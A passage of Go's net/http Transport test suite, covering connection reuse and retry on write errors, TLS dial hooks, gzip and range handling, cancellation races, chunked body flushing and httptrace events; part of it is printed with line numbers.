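// writerFuncConn is a net.Conn whose Write calls are routed through the
// write hook, letting tests inject write failures.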
type writerFuncConn struct {
	net.Conn
	write func(p []byte) (n int, err error)
}

func (c writerFuncConn) Write(p []byte) (n int, err error) { return c.write(p) }

// Issues 4677, 18241, and 17844. If we try to reuse a connection that the
// server is in the process of closing, we may end up successfully writing out
// our request (or a portion of our request) only to find a connection error
// when we try to read from (or finish writing to) the socket.
//
// NOTE: we resend a request only if:
//   - we reused a keep-alive connection
//   - we haven't yet received any header data
//   - either we wrote no bytes to the server, or the request is idempotent
//
// This automatically prevents an infinite resend loop because we'll run out of
// the cached keep-alive connections eventually.
func TestRetryRequestsOnError(t *testing.T) {
	newRequest := func(method, urlStr string, body io.Reader) *Request {
		req, err := NewRequest(method, urlStr, body)
		if err != nil {
			t.Fatal(err)
		}
		return req
	}

	testCases := []struct {
		name       string
		failureN   int
		failureErr error
		// Note that we can't just re-use the Request object across calls to c.Do
		// because we need to rewind Body between calls. (GetBody is only used to
		// rewind Body on failure and redirects, not just because it's done.)
		req       func() *Request
		reqString string
	}{
		{
			name: "IdempotentNoBodySomeWritten",
			// Believe that we've written some bytes to the server, so we know we're
			// not just in the "retry when no bytes sent" case.
			failureN: 1,
			// Use the specific error that shouldRetryRequest looks for with idempotent requests.
			failureErr: ExportErrServerClosedIdle,
			req: func() *Request {
				return newRequest("GET", "http://fake.golang", nil)
			},
			reqString: `GET / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n`,
		},
		{
			name: "IdempotentGetBodySomeWritten",
			// Believe that we've written some bytes to the server, so we know we're
			// not just in the "retry when no bytes sent" case.
			failureN: 1,
			// Use the specific error that shouldRetryRequest looks for with idempotent requests.
			failureErr: ExportErrServerClosedIdle,
			req: func() *Request {
				return newRequest("GET", "http://fake.golang", strings.NewReader("foo\n"))
			},
			reqString: `GET / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 4\r\nAccept-Encoding: gzip\r\n\r\nfoo\n`,
		},
		{
			name: "NothingWrittenNoBody",
			// It's key that we return 0 here -- that's what enables Transport to know
			// that nothing was written, even though this is a non-idempotent request.
			failureN:   0,
			failureErr: errors.New("second write fails"),
			req: func() *Request {
				return newRequest("DELETE", "http://fake.golang", nil)
			},
			reqString: `DELETE / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n`,
		},
		{
			name: "NothingWrittenGetBody",
			// It's key that we return 0 here -- that's what enables Transport to know
			// that nothing was written, even though this is a non-idempotent request.
			failureN:   0,
			failureErr: errors.New("second write fails"),
			// Note that NewRequest will set up GetBody for strings.Reader, which is
			// required for the retry to occur.
			req: func() *Request {
				return newRequest("POST", "http://fake.golang", strings.NewReader("foo\n"))
			},
			reqString: `POST / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 4\r\nAccept-Encoding: gzip\r\n\r\nfoo\n`,
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			defer afterTest(t)

			var (
				mu     sync.Mutex
				logbuf bytes.Buffer
			)
			logf := func(format string, args ...interface{}) {
				mu.Lock()
				defer mu.Unlock()
				fmt.Fprintf(&logbuf, format, args...)
				logbuf.WriteByte('\n')
			}

			ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
				logf("Handler")
				w.Header().Set("X-Status", "ok")
			}))
			defer ts.Close()

			var writeNumAtomic int32
			c := ts.Client()
			c.Transport.(*Transport).Dial = func(network, addr string) (net.Conn, error) {
				logf("Dial")
				c, err := net.Dial(network, ts.Listener.Addr().String())
				if err != nil {
					logf("Dial error: %v", err)
					return nil, err
				}
				return &writerFuncConn{
					Conn: c,
					write: func(p []byte) (n int, err error) {
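						// Fail the second Write the client issues: the first
						// request succeeds and its conn goes idle, so reusing it
						// for the next request fails and must trigger a retry.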
						if atomic.AddInt32(&writeNumAtomic, 1) == 2 {
							logf("intentional write failure")
							return tc.failureN, tc.failureErr
						}
						logf("Write(%q)", p)
						return c.Write(p)
					},
				}, nil
			}

			SetRoundTripRetried(func() {
				logf("Retried.")
			})
			defer SetRoundTripRetried(nil)

			for i := 0; i < 3; i++ {
				t0 := time.Now()
				res, err := c.Do(tc.req())
				if err != nil {
					if time.Since(t0) < MaxWriteWaitBeforeConnReuse/2 {
						mu.Lock()
						got := logbuf.String()
						mu.Unlock()
						t.Fatalf("i=%d: Do = %v; log:\n%s", i, err, got)
					}
					t.Skipf("connection likely wasn't recycled within %d, interfering with actual test; skipping", MaxWriteWaitBeforeConnReuse)
				}
				res.Body.Close()
			}

			mu.Lock()
			got := logbuf.String()
			mu.Unlock()
			want := fmt.Sprintf(`Dial
Write("%s")
Handler
intentional write failure
Retried.
Dial
Write("%s")
Handler
Write("%s")
Handler
`, tc.reqString, tc.reqString, tc.reqString)
			if got != want {
				t.Errorf("Log of events differs. Got:\n%s\nWant:\n%s", got, want)
			}
		})
	}
}

// Issue 6981
func TestTransportClosesBodyOnError(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	readBody := make(chan error, 1)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		_, err := ioutil.ReadAll(r.Body)
		readBody <- err
	}))
	defer ts.Close()
	c := ts.Client()
	fakeErr := errors.New("fake error")
	didClose := make(chan bool, 1)
	req, _ := NewRequest("POST", ts.URL, struct {
		io.Reader
		io.Closer
	}{
		io.MultiReader(io.LimitReader(neverEnding('x'), 1<<20), errorReader{fakeErr}),
		closerFunc(func() error {
			select {
			case didClose <- true:
			default:
			}
			return nil
		}),
	})
	res, err := c.Do(req)
	if res != nil {
		defer res.Body.Close()
	}
	if err == nil || !strings.Contains(err.Error(), fakeErr.Error()) {
		t.Fatalf("Do error = %v; want something containing %q", err, fakeErr.Error())
	}
	select {
	case err := <-readBody:
		if err == nil {
			t.Errorf("Unexpected success reading request body from handler; want 'unexpected EOF reading trailer'")
		}
	case <-time.After(5 * time.Second):
		t.Error("timeout waiting for server handler to complete")
	}
	select {
	case <-didClose:
	default:
		t.Errorf("didn't see Body.Close")
	}
}

func TestTransportDialTLS(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	var mu sync.Mutex // guards following
	var gotReq, didDial bool

	ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		mu.Lock()
		gotReq = true
		mu.Unlock()
	}))
	defer ts.Close()
	c := ts.Client()
	c.Transport.(*Transport).DialTLS = func(netw, addr string) (net.Conn, error) {
		mu.Lock()
		didDial = true
		mu.Unlock()
		c, err := tls.Dial(netw, addr, c.Transport.(*Transport).TLSClientConfig)
		if err != nil {
			return nil, err
		}
		return c, c.Handshake()
	}

	res, err := c.Get(ts.URL)
	if err != nil {
		t.Fatal(err)
	}
	res.Body.Close()
	mu.Lock()
	if !gotReq {
		t.Error("didn't get request")
	}
	if !didDial {
		t.Error("didn't use dial hook")
	}
}

// Test for issue 8755.
// Ensure that if a proxy returns an error, it is exposed by RoundTrip.
func TestRoundTripReturnsProxyError(t *testing.T) {
	badProxy := func(*Request) (*url.URL, error) {
		return nil, errors.New("errorMessage")
	}

	tr := &Transport{Proxy: badProxy}

	req, _ := NewRequest("GET", "http://example.com", nil)

	_, err := tr.RoundTrip(req)

	if err == nil {
		t.Error("Expected proxy error to be returned by RoundTrip")
	}
}

// Tests that putting an idle conn after a call to CloseIdleConnections fails,
// and that the Transport accepts idle conns again once one is requested.
func TestTransportCloseIdleConnsThenReturn(t *testing.T) {
	tr := &Transport{}
	wantIdle := func(when string, n int) bool {
		got := tr.IdleConnCountForTesting("http", "example.com") // key used by PutIdleTestConn
		if got == n {
			return true
		}
		t.Errorf("%s: idle conns = %d; want %d", when, got, n)
		return false
	}
	wantIdle("start", 0)
	if !tr.PutIdleTestConn("http", "example.com") {
		t.Fatal("put failed")
	}
	if !tr.PutIdleTestConn("http", "example.com") {
		t.Fatal("second put failed")
	}
	wantIdle("after put", 2)
	tr.CloseIdleConnections()
	if !tr.IsIdleForTesting() {
		t.Error("should be idle after CloseIdleConnections")
	}
	wantIdle("after close idle", 0)
	if tr.PutIdleTestConn("http", "example.com") {
		t.Fatal("put didn't fail")
	}
	wantIdle("after second put", 0)

	tr.RequestIdleConnChForTesting() // should toggle the transport out of idle mode
	if tr.IsIdleForTesting() {
		t.Error("shouldn't be idle after RequestIdleConnChForTesting")
	}
	if !tr.PutIdleTestConn("http", "example.com") {
		t.Fatal("after re-activation")
	}
	wantIdle("after final put", 1)
}
3282
3283 // This tests that an client requesting a content range won't also
3284 // implicitly ask for gzip support. If they want that, they need to do it
3285 // on their own.
3286 // golang.org/issue/8923
3287 func TestTransportRangeAndGzip(t *testing.T) {
3288 defer afterTest(t)
3289 reqc := make(chan *Request, 1)
3290 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3291 reqc <- r
3292 }))
3293 defer ts.Close()
3294 c := ts.Client()
3295
3296 req, _ := NewRequest("GET", ts.URL, nil)
3297 req.Header.Set("Range", "bytes=7-11")
3298 res, err := c.Do(req)
3299 if err != nil {
3300 t.Fatal(err)
3301 }
3302
3303 select {
3304 case r := <-reqc:
3305 if strings.Contains(r.Header.Get("Accept-Encoding"), "gzip") {
3306 t.Error("Transport advertised gzip support in the Accept header")
3307 }
3308 if r.Header.Get("Range") == "" {
3309 t.Error("no Range in request")
3310 }
3311 case <-time.After(10 * time.Second):
3312 t.Fatal("timeout")
3313 }
3314 res.Body.Close()
3315 }
3316
3317 // Test for issue 10474
3318 func TestTransportResponseCancelRace(t *testing.T) {
3319 defer afterTest(t)
3320
3321 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3322 // important that this response has a body.
3323 var b [1024]byte
3324 w.Write(b[:])
3325 }))
3326 defer ts.Close()
3327 tr := ts.Client().Transport.(*Transport)
3328
3329 req, err := NewRequest("GET", ts.URL, nil)
3330 if err != nil {
3331 t.Fatal(err)
3332 }
3333 res, err := tr.RoundTrip(req)
3334 if err != nil {
3335 t.Fatal(err)
3336 }
3337 // If we do an early close, Transport just throws the connection away and
3338 // doesn't reuse it. In order to trigger the bug, it has to reuse the connection,
3339 // so read the body.
3340 if _, err := io.Copy(ioutil.Discard, res.Body); err != nil {
3341 t.Fatal(err)
3342 }
3343
3344 req2, err := NewRequest("GET", ts.URL, nil)
3345 if err != nil {
3346 t.Fatal(err)
3347 }
3348 tr.CancelRequest(req)
3349 res, err = tr.RoundTrip(req2)
3350 if err != nil {
3351 t.Fatal(err)
3352 }
3353 res.Body.Close()
3354 }
3355
3356 // Test for issue 19248: Content-Encoding's value is case insensitive.
3357 func TestTransportContentEncodingCaseInsensitive(t *testing.T) {
3358 setParallel(t)
3359 defer afterTest(t)
3360 for _, ce := range []string{"gzip", "GZIP"} {
3361 ce := ce
3362 t.Run(ce, func(t *testing.T) {
3363 const encodedString = "Hello Gopher"
3364 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3365 w.Header().Set("Content-Encoding", ce)
3366 gz := gzip.NewWriter(w)
3367 gz.Write([]byte(encodedString))
3368 gz.Close()
3369 }))
3370 defer ts.Close()
3371
3372 res, err := ts.Client().Get(ts.URL)
3373 if err != nil {
3374 t.Fatal(err)
3375 }
3376
3377 body, err := ioutil.ReadAll(res.Body)
3378 res.Body.Close()
3379 if err != nil {
3380 t.Fatal(err)
3381 }
3382
3383 if string(body) != encodedString {
3384 t.Fatalf("Expected body %q, got: %q\n", encodedString, string(body))
3385 }
3386 })
3387 }
3388 }
3389
3390 func TestTransportDialCancelRace(t *testing.T) {
3391 defer afterTest(t)
3392
3393 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {}))
3394 defer ts.Close()
3395 tr := ts.Client().Transport.(*Transport)
3396
3397 req, err := NewRequest("GET", ts.URL, nil)
3398 if err != nil {
3399 t.Fatal(err)
3400 }
3401 SetEnterRoundTripHook(func() {
3402 tr.CancelRequest(req)
3403 })
3404 defer SetEnterRoundTripHook(nil)
3405 res, err := tr.RoundTrip(req)
3406 if err != ExportErrRequestCanceled {
3407 t.Errorf("expected canceled request error; got %v", err)
3408 if err == nil {
3409 res.Body.Close()
3410 }
3411 }
3412 }
3413
3414 // logWritesConn is a net.Conn that logs each Write call to writes
3415 // and then proxies to w.
3416 // It proxies Read calls to a reader it receives from rch.
3417 type logWritesConn struct {
3418 net.Conn // nil. crash on use.
3419
3420 w io.Writer
3421
3422 rch <-chan io.Reader
3423 r io.Reader // nil until received by rch
3424
3425 mu sync.Mutex
3426 writes []string
3427 }
3428
3429 func (c *logWritesConn) Write(p []byte) (n int, err error) {
3430 c.mu.Lock()
3431 defer c.mu.Unlock()
3432 c.writes = append(c.writes, string(p))
3433 return c.w.Write(p)
3434 }
3435
3436 func (c *logWritesConn) Read(p []byte) (n int, err error) {
3437 if c.r == nil {
3438 c.r = <-c.rch
3439 }
3440 return c.r.Read(p)
3441 }
3442
3443 func (c *logWritesConn) Close() error { return nil }
3444
3445 // Issue 6574
3446 func TestTransportFlushesBodyChunks(t *testing.T) {
3447 defer afterTest(t)
3448 resBody := make(chan io.Reader, 1)
3449 connr, connw := io.Pipe() // connection pipe pair
3450 lw := &logWritesConn{
3451 rch: resBody,
3452 w: connw,
3453 }
3454 tr := &Transport{
3455 Dial: func(network, addr string) (net.Conn, error) {
3456 return lw, nil
3457 },
3458 }
3459 bodyr, bodyw := io.Pipe() // body pipe pair
3460 go func() {
3461 defer bodyw.Close()
3462 for i := 0; i < 3; i++ {
3463 fmt.Fprintf(bodyw, "num%d\n", i)
3464 }
3465 }()
3466 resc := make(chan *Response)
3467 go func() {
3468 req, _ := NewRequest("POST", "http://localhost:8080", bodyr)
3469 req.Header.Set("User-Agent", "x") // known value for test
3470 res, err := tr.RoundTrip(req)
3471 if err != nil {
3472 t.Errorf("RoundTrip: %v", err)
3473 close(resc)
3474 return
3475 }
3476 resc <- res
3477
3478 }()
3479 // Fully consume the request before checking the Write log vs. want.
3480 req, err := ReadRequest(bufio.NewReader(connr))
3481 if err != nil {
3482 t.Fatal(err)
3483 }
3484 io.Copy(ioutil.Discard, req.Body)
3485
3486 // Unblock the transport's roundTrip goroutine.
3487 resBody <- strings.NewReader("HTTP/1.1 204 No Content\r\nConnection: close\r\n\r\n")
3488 res, ok := <-resc
3489 if !ok {
3490 return
3491 }
3492 defer res.Body.Close()
3493
3494 want := []string{
3495 "POST / HTTP/1.1\r\nHost: localhost:8080\r\nUser-Agent: x\r\nTransfer-Encoding: chunked\r\nAccept-Encoding: gzip\r\n\r\n",
3496 "5\r\nnum0\n\r\n",
3497 "5\r\nnum1\n\r\n",
3498 "5\r\nnum2\n\r\n",
3499 "0\r\n\r\n",
3500 }
3501 if !reflect.DeepEqual(lw.writes, want) {
3502 t.Errorf("Writes differed.\n Got: %q\nWant: %q\n", lw.writes, want)
3503 }
3504 }
3505
3506 // Issue 22088: flush Transport request headers if we're not sure the body won't block on read.
3507 func TestTransportFlushesRequestHeader(t *testing.T) {
3508 defer afterTest(t)
3509 gotReq := make(chan struct{})
3510 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
3511 close(gotReq)
3512 }))
3513 defer cst.close()
3514
3515 pr, pw := io.Pipe()
3516 req, err := NewRequest("POST", cst.ts.URL, pr)
3517 if err != nil {
3518 t.Fatal(err)
3519 }
3520 gotRes := make(chan struct{})
3521 go func() {
3522 defer close(gotRes)
3523 res, err := cst.tr.RoundTrip(req)
3524 if err != nil {
3525 t.Error(err)
3526 return
3527 }
3528 res.Body.Close()
3529 }()
3530
3531 select {
3532 case <-gotReq:
3533 pw.Close()
3534 case <-time.After(5 * time.Second):
3535 t.Fatal("timeout waiting for handler to get request")
3536 }
3537 <-gotRes
3538 }
3539
3540 // Issue 11745.
3541 func TestTransportPrefersResponseOverWriteError(t *testing.T) {
3542 if testing.Short() {
3543 t.Skip("skipping in short mode")
3544 }
3545 defer afterTest(t)
3546 const contentLengthLimit = 1024 * 1024 // 1MB
3547 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3548 if r.ContentLength >= contentLengthLimit {
3549 w.WriteHeader(StatusBadRequest)
3550 r.Body.Close()
3551 return
3552 }
3553 w.WriteHeader(StatusOK)
3554 }))
3555 defer ts.Close()
3556 c := ts.Client()
3557
3558 fail := 0
3559 count := 100
3560 bigBody := strings.Repeat("a", contentLengthLimit*2)
3561 for i := 0; i < count; i++ {
3562 req, err := NewRequest("PUT", ts.URL, strings.NewReader(bigBody))
3563 if err != nil {
3564 t.Fatal(err)
3565 }
3566 resp, err := c.Do(req)
3567 if err != nil {
3568 fail++
3569 t.Logf("%d = %#v", i, err)
3570 if ue, ok := err.(*url.Error); ok {
3571 t.Logf("urlErr = %#v", ue.Err)
3572 if ne, ok := ue.Err.(*net.OpError); ok {
3573 t.Logf("netOpError = %#v", ne.Err)
3574 }
3575 }
3576 } else {
3577 resp.Body.Close()
3578 if resp.StatusCode != 400 {
3579 t.Errorf("Expected status code 400, got %v", resp.Status)
3580 }
3581 }
3582 }
3583 if fail > 0 {
3584 t.Errorf("Failed %v out of %v\n", fail, count)
3585 }
3586 }
3587
3588 func TestTransportAutomaticHTTP2(t *testing.T) {
3589 testTransportAutoHTTP(t, &Transport{}, true)
3590 }
3591
3592 // golang.org/issue/14391: also check DefaultTransport
3593 func TestTransportAutomaticHTTP2_DefaultTransport(t *testing.T) {
3594 testTransportAutoHTTP(t, DefaultTransport.(*Transport), true)
3595 }
3596
3597 func TestTransportAutomaticHTTP2_TLSNextProto(t *testing.T) {
3598 testTransportAutoHTTP(t, &Transport{
3599 TLSNextProto: make(map[string]func(string, *tls.Conn) RoundTripper),
3600 }, false)
3601 }
3602
3603 func TestTransportAutomaticHTTP2_TLSConfig(t *testing.T) {
3604 testTransportAutoHTTP(t, &Transport{
3605 TLSClientConfig: new(tls.Config),
3606 }, false)
3607 }
3608
3609 func TestTransportAutomaticHTTP2_ExpectContinueTimeout(t *testing.T) {
3610 testTransportAutoHTTP(t, &Transport{
3611 ExpectContinueTimeout: 1 * time.Second,
3612 }, true)
3613 }
3614
3615 func TestTransportAutomaticHTTP2_Dial(t *testing.T) {
3616 var d net.Dialer
3617 testTransportAutoHTTP(t, &Transport{
3618 Dial: d.Dial,
3619 }, false)
3620 }
3621
3622 func TestTransportAutomaticHTTP2_DialTLS(t *testing.T) {
3623 testTransportAutoHTTP(t, &Transport{
3624 DialTLS: func(network, addr string) (net.Conn, error) {
3625 panic("unused")
3626 },
3627 }, false)
3628 }
3629
3630 func testTransportAutoHTTP(t *testing.T, tr *Transport, wantH2 bool) {
3631 _, err := tr.RoundTrip(new(Request))
3632 if err == nil {
3633 t.Error("expected error from RoundTrip")
3634 }
3635 if reg := tr.TLSNextProto["h2"] != nil; reg != wantH2 {
3636 t.Errorf("HTTP/2 registered = %v; want %v", reg, wantH2)
3637 }
3638 }
3639
3640 // Issue 13633: there was a race where we returned bodyless responses
3641 // to callers before recycling the persistent connection, which meant
3642 // a client doing two subsequent requests could end up on different
3643 // connections. It's somewhat harmless, but enough tests rely on the
3644 // connection being reused that the race is worth fixing.
3645 // Plus it's nice to be consistent and not have timing-dependent
3646 // behavior.
3647 func TestTransportReuseConnEmptyResponseBody(t *testing.T) {
3648 defer afterTest(t)
3649 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
3650 w.Header().Set("X-Addr", r.RemoteAddr)
3651 // Empty response body.
3652 }))
3653 defer cst.close()
3654 n := 100
3655 if testing.Short() {
3656 n = 10
3657 }
3658 var firstAddr string
3659 for i := 0; i < n; i++ {
3660 res, err := cst.c.Get(cst.ts.URL)
3661 if err != nil {
3662 t.Fatal(err)
3663 }
3664 addr := res.Header.Get("X-Addr")
3665 if i == 0 {
3666 firstAddr = addr
3667 } else if addr != firstAddr {
3668 t.Fatalf("On request %d, addr %q != original addr %q", i+1, addr, firstAddr)
3669 }
3670 res.Body.Close()
3671 }
3672 }
3673
3674 // Issue 13839
3675 func TestNoCrashReturningTransportAltConn(t *testing.T) {
3676 cert, err := tls.X509KeyPair(internal.LocalhostCert, internal.LocalhostKey)
3677 if err != nil {
3678 t.Fatal(err)
3679 }
3680 ln := newLocalListener(t)
3681 defer ln.Close()
3682
3683 handledPendingDial := make(chan bool, 1)
3684 SetPendingDialHooks(nil, func() { handledPendingDial <- true })
3685 defer SetPendingDialHooks(nil, nil)
3686
3687 testDone := make(chan struct{})
3688 defer close(testDone)
3689 go func() {
3690 tln := tls.NewListener(ln, &tls.Config{
3691 NextProtos: []string{"foo"},
3692 Certificates: []tls.Certificate{cert},
3693 })
3694 sc, err := tln.Accept()
3695 if err != nil {
3696 t.Error(err)
3697 return
3698 }
3699 if err := sc.(*tls.Conn).Handshake(); err != nil {
3700 t.Error(err)
3701 return
3702 }
3703 <-testDone
3704 sc.Close()
3705 }()
3706
3707 addr := ln.Addr().String()
3708
3709 req, _ := NewRequest("GET", "https://fake.tld/", nil)
3710 cancel := make(chan struct{})
3711 req.Cancel = cancel
3712
3713 doReturned := make(chan bool, 1)
3714 madeRoundTripper := make(chan bool, 1)
3715
3716 tr := &Transport{
3717 DisableKeepAlives: true,
3718 TLSNextProto: map[string]func(string, *tls.Conn) RoundTripper{
3719 "foo": func(authority string, c *tls.Conn) RoundTripper {
3720 madeRoundTripper <- true
3721 return funcRoundTripper(func() {
3722 t.Error("foo RoundTripper should not be called")
3723 })
3724 },
3725 },
3726 Dial: func(_, _ string) (net.Conn, error) {
3727 panic("shouldn't be called")
3728 },
3729 DialTLS: func(_, _ string) (net.Conn, error) {
3730 tc, err := tls.Dial("tcp", addr, &tls.Config{
3731 InsecureSkipVerify: true,
3732 NextProtos: []string{"foo"},
3733 })
3734 if err != nil {
3735 return nil, err
3736 }
3737 if err := tc.Handshake(); err != nil {
3738 return nil, err
3739 }
3740 close(cancel)
3741 <-doReturned
3742 return tc, nil
3743 },
3744 }
3745 c := &Client{Transport: tr}
3746
3747 _, err = c.Do(req)
3748 if ue, ok := err.(*url.Error); !ok || ue.Err != ExportErrRequestCanceledConn {
3749 t.Fatalf("Do error = %v; want url.Error with errRequestCanceledConn", err)
3750 }
3751
3752 doReturned <- true
3753 <-madeRoundTripper
3754 <-handledPendingDial
3755 }
3756
3757 func TestTransportReuseConnection_Gzip_Chunked(t *testing.T) {
3758 testTransportReuseConnection_Gzip(t, true)
3759 }
3760
3761 func TestTransportReuseConnection_Gzip_ContentLength(t *testing.T) {
3762 testTransportReuseConnection_Gzip(t, false)
3763 }
3764
3765 // Make sure we re-use the underlying TCP connection for gzipped responses too.
3766 func testTransportReuseConnection_Gzip(t *testing.T, chunked bool) {
3767 setParallel(t)
3768 defer afterTest(t)
3769 addr := make(chan string, 2)
3770 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3771 addr <- r.RemoteAddr
3772 w.Header().Set("Content-Encoding", "gzip")
3773 if chunked {
3774 w.(Flusher).Flush()
3775 }
3776 w.Write(rgz) // arbitrary gzip response
3777 }))
3778 defer ts.Close()
3779 c := ts.Client()
3780
3781 for i := 0; i < 2; i++ {
3782 res, err := c.Get(ts.URL)
3783 if err != nil {
3784 t.Fatal(err)
3785 }
3786 buf := make([]byte, len(rgz))
3787 if n, err := io.ReadFull(res.Body, buf); err != nil {
3788 t.Errorf("%d. ReadFull = %v, %v", i, n, err)
3789 }
3790 // Note: no res.Body.Close call. It should work without it,
3791 // since the flate.Reader's internal buffering will hit EOF
3792 // and that should be sufficient.
3793 }
3794 a1, a2 := <-addr, <-addr
3795 if a1 != a2 {
3796 t.Fatalf("didn't reuse connection")
3797 }
3798 }
3799
3800 func TestTransportResponseHeaderLength(t *testing.T) {
3801 setParallel(t)
3802 defer afterTest(t)
3803 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3804 if r.URL.Path == "/long" {
3805 w.Header().Set("Long", strings.Repeat("a", 1<<20))
3806 }
3807 }))
3808 defer ts.Close()
3809 c := ts.Client()
3810 c.Transport.(*Transport).MaxResponseHeaderBytes = 512 << 10
3811
3812 if res, err := c.Get(ts.URL); err != nil {
3813 t.Fatal(err)
3814 } else {
3815 res.Body.Close()
3816 }
3817
3818 res, err := c.Get(ts.URL + "/long")
3819 if err == nil {
3820 defer res.Body.Close()
3821 var n int64
3822 for k, vv := range res.Header {
3823 for _, v := range vv {
3824 n += int64(len(k)) + int64(len(v))
3825 }
3826 }
3827 t.Fatalf("Unexpected success. Got %v and %d bytes of response headers", res.Status, n)
3828 }
3829 if want := "server response headers exceeded 524288 bytes"; !strings.Contains(err.Error(), want) {
3830 t.Errorf("got error: %v; want %q", err, want)
3831 }
3832 }
3833
3834 func TestTransportEventTrace(t *testing.T) { testTransportEventTrace(t, h1Mode, false) }
3835 func TestTransportEventTrace_h2(t *testing.T) { testTransportEventTrace(t, h2Mode, false) }
3836
3837 // test a non-nil httptrace.ClientTrace but with all hooks set to zero.
3838 func TestTransportEventTrace_NoHooks(t *testing.T) { testTransportEventTrace(t, h1Mode, true) }
3839 func TestTransportEventTrace_NoHooks_h2(t *testing.T) { testTransportEventTrace(t, h2Mode, true) }
3840
3841 func testTransportEventTrace(t *testing.T, h2 bool, noHooks bool) {
3842 defer afterTest(t)
3843 const resBody = "some body"
3844 gotWroteReqEvent := make(chan struct{}, 500)
3845 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
3846 if r.Method == "GET" {
3847 // Do nothing for the second request.
3848 return
3849 }
3850 if _, err := ioutil.ReadAll(r.Body); err != nil {
3851 t.Error(err)
3852 }
3853 if !noHooks {
3854 select {
3855 case <-gotWroteReqEvent:
3856 case <-time.After(5 * time.Second):
3857 t.Error("timeout waiting for WroteRequest event")
3858 }
3859 }
3860 io.WriteString(w, resBody)
3861 }))
3862 defer cst.close()
3863
3864 cst.tr.ExpectContinueTimeout = 1 * time.Second
3865
3866 var mu sync.Mutex // guards buf
3867 var buf bytes.Buffer
3868 logf := func(format string, args ...interface{}) {
3869 mu.Lock()
3870 defer mu.Unlock()
3871 fmt.Fprintf(&buf, format, args...)
3872 buf.WriteByte('\n')
3873 }
3874
3875 addrStr := cst.ts.Listener.Addr().String()
3876 ip, port, err := net.SplitHostPort(addrStr)
3877 if err != nil {
3878 t.Fatal(err)
3879 }
3880
3881 // Install a fake DNS server.
3882 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, network, host string) ([]net.IPAddr, error) {
3883 if host != "dns-is-faked.golang" {
3884 t.Errorf("unexpected DNS host lookup for %q/%q", network, host)
3885 return nil, nil
3886 }
3887 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
3888 })
3889
3890 body := "some body"
3891 req, _ := NewRequest("POST", cst.scheme()+"://dns-is-faked.golang:"+port, strings.NewReader(body))
3892 req.Header["X-Foo-Multiple-Vals"] = []string{"bar", "baz"}
3893 trace := &httptrace.ClientTrace{
3894 GetConn: func(hostPort string) { logf("Getting conn for %v ...", hostPort) },
3895 GotConn: func(ci httptrace.GotConnInfo) { logf("got conn: %+v", ci) },
3896 GotFirstResponseByte: func() { logf("first response byte") },
3897 PutIdleConn: func(err error) { logf("PutIdleConn = %v", err) },
3898 DNSStart: func(e httptrace.DNSStartInfo) { logf("DNS start: %+v", e) },
3899 DNSDone: func(e httptrace.DNSDoneInfo) { logf("DNS done: %+v", e) },
3900 ConnectStart: func(network, addr string) { logf("ConnectStart: Connecting to %s %s ...", network, addr) },
3901 ConnectDone: func(network, addr string, err error) {
3902 if err != nil {
3903 t.Errorf("ConnectDone: %v", err)
3904 }
3905 logf("ConnectDone: connected to %s %s = %v", network, addr, err)
3906 },
3907 WroteHeaderField: func(key string, value []string) {
3908 logf("WroteHeaderField: %s: %v", key, value)
3909 },
3910 WroteHeaders: func() {
3911 logf("WroteHeaders")
3912 },
3913 Wait100Continue: func() { logf("Wait100Continue") },
3914 Got100Continue: func() { logf("Got100Continue") },
3915 WroteRequest: func(e httptrace.WroteRequestInfo) {
3916 logf("WroteRequest: %+v", e)
3917 gotWroteReqEvent <- struct{}{}
3918 },
3919 }
3920 if h2 {
3921 trace.TLSHandshakeStart = func() { logf("tls handshake start") }
3922 trace.TLSHandshakeDone = func(s tls.ConnectionState, err error) {
3923 logf("tls handshake done. ConnectionState = %v \n err = %v", s, err)
3924 }
3925 }
3926 if noHooks {
3927 // zero out all func pointers, trying to get some path to crash
3928 *trace = httptrace.ClientTrace{}
3929 }
3930 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
3931
3932 req.Header.Set("Expect", "100-continue")
3933 res, err := cst.c.Do(req)
3934 if err != nil {
3935 t.Fatal(err)
3936 }
3937 logf("got roundtrip.response")
3938 slurp, err := ioutil.ReadAll(res.Body)
3939 if err != nil {
3940 t.Fatal(err)
3941 }
3942 logf("consumed body")
3943 if string(slurp) != resBody || res.StatusCode != 200 {
3944 t.Fatalf("Got %q, %v; want %q, 200 OK", slurp, res.Status, resBody)
3945 }
3946 res.Body.Close()
3947
3948 if noHooks {
3949 // Done at this point. Just testing that a full HTTP
3950 // request can happen with a trace pointing to a zero
3951 // ClientTrace, full of nil func pointers.
3952 return
3953 }
3954
3955 mu.Lock()
3956 got := buf.String()
3957 mu.Unlock()
3958
3959 wantOnce := func(sub string) {
3960 if strings.Count(got, sub) != 1 {
3961 t.Errorf("expected substring %q exactly once in output.", sub)
3962 }
3963 }
3964 wantOnceOrMore := func(sub string) {
3965 if strings.Count(got, sub) == 0 {
